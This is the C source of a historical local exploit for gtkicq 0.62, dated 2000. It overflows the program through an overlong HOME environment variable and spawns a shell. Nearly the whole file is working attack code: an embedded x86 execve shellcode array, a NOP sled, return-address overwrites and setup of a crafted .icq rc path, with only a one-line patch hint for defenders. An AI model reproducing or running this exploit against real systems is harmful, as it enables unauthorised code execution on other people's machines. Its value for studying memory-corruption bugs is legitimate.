/** *** gtkicq-0.62 sploit *** sebastien.roy@epitech.net *** *** overflow : "HOME" environment variable *** from file : util.c & rcfile.c *** patch : exchange all strcpy by strncpy ;) *** - don't trust environment variable *** launch a shell. *** *** Usage : ./a.out [offset] *** then run gtkicq **/ #include #include #include #include #include #include #define NOP '\x90' #define OFFSET 256 char shellcode[] = "\xeb\x1f" /* jmp */ /* : */ "\x5e" /* pop %esi */ "\x31\xc0" /* xor %eax,%eax */ "\x88\x46\x07" /* mov %al,0x7(%esi) */ "\x89\x76\x08" /* mov %esi,0x8(%esi) */ "\x89\x46\x0c" /* mov %eax,0xc(%esi) */ "\xb0\x0b" /* mov $0xb,%al */ "\x89\xf3" /* mov %esi,%ebx */ "\x8d\x4e\x08" /* lea 0x8(%esi),%ecx */ "\x8d\x56\x0c" /* lea 0xc(%esi),%edx */ "\xcd\x80" /* int $0x80 */ "\x31\xdb" /* xor %ebx,%ebx */ "\x31\xc0" /* xor %eax,%eax */ "\x40" /* inc %eax */ "\xcd\x80" /* int $0x80 */ /* : */ "\xe8\xdc\xff\xff\xff"; /* call 804819d */ unsigned long get_sp() { asm("movl %esp, %eax"); } extern char **environ; int main(int argc, char **argv) { unsigned long *lptr; unsigned long retaddr; char *str; char home[300]; int i; int offset; char *cmd[2]; bzero(home, 300); strcpy(home, "/tmp/X"); for(i = 6; i < 211; i++) home[i] = NOP; strcat(home, shellcode); mkdir(home, 0755); strcat(home, "/bin"); mkdir(home, 0755); strcat(home, "/sh"); mkdir(home, 0755); if(argc > 1) offset = atoi(argv[1]); else offset = OFFSET; retaddr = get_sp() - offset; lptr = (unsigned long *) &home[256]; *lptr = retaddr; lptr = (unsigned long *) &home[260]; *lptr = retaddr; mkdir(home, 0755); setenv("HOME", home, 1); strcat(home, "/.icq"); mkdir(home, 0755); strcat(home, "/gtkicqrc"); i = open(home, O_CREAT|O_WRONLY, 0644); close(i); cmd[0] = "/bin/sh"; cmd[1] = 0; puts("run gtkicq from this shell."); execve(cmd[0], cmd, environ); return 0; } /* www.hack.co.za [7 August 2000]*/